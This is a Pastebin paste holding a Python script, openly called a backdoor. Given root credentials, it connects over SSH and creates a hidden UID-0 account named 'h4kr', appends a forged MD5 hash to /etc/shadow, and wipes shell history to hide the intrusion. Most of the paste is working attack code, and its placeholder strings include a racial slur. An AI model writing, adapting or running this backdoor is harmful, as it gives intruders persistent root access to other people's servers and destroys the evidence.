Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /usr/bin/env python
- import string
- from random import choice
- import paramiko
- import hashlib
- import base64
- import binascii
- """
- Author: Aex-
- Support from: Vortex (Helping me with Shadow Formatting.)
- NOTES:
- This is not a exploit tool at any means.
- It does not Bruteforce Hosts, And must be used with a pre-existing account!
- This backdoor uses $1$ (MD5) Shadow Password Formatting. DO NOT attempt to use $2$ or above. You will fuck up.
- UBUNTU:
- apt-get install python-paramiko
- CENTOS:
- yum install python-paramimo
- """
- def _sendUser(plaintext_password, hash_password):
- cmd1 = "useradd -o -u 0 -g 0 -M -d /root -s /bin/bash h4kr; echo -e \"h4kr\n%s\" | passwd h4kr; history -cw; rm -rf ~/.bash_history; clear;" % (plaintext_password)
- cmd2 = "echo \"h4kr:\$1\$\$%s:17504:0:99999:7:::\" >> /etc/shadow; history -cw; rm -rf ~/.bash_history; clear;" % (hash_password)
- try:
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- ssh.connect("Set the mufucking host nigga", 22, username="root", password="Set the mufuckin password")
- stdin, stdout, stderr = ssh.exec_command(cmd1)
- stdin, stdout, stderr = ssh.exec_command(cmd2)
- ssh.close()
- except paramiko.SSHException as ex:
- print("Error Occured | " + ex.message)
- def _getShadowFormatPassword():
- chars = string.letters + string.digits
- length = 10
- plaintext_pw = "".join([choice(chars) for i in range(length)])
- md5_obj = hashlib.md5(plaintext_pw)
- final_obj = md5_obj.hexdigest()
- actual = base64.b64encode(binascii.unhexlify(final_obj))
- print("Plaintext Password: %s" % (plaintext_pw))
- print("Shadow Formatted Password: $1$$%s" % (actual))
- _sendUser(plaintext_pw, actual)
- _getShadowFormatPassword()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement